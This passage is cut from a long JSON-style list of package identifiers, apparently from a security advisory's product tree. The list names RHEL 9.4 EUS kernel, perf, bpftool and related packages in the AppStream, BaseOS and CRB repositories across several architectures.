"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
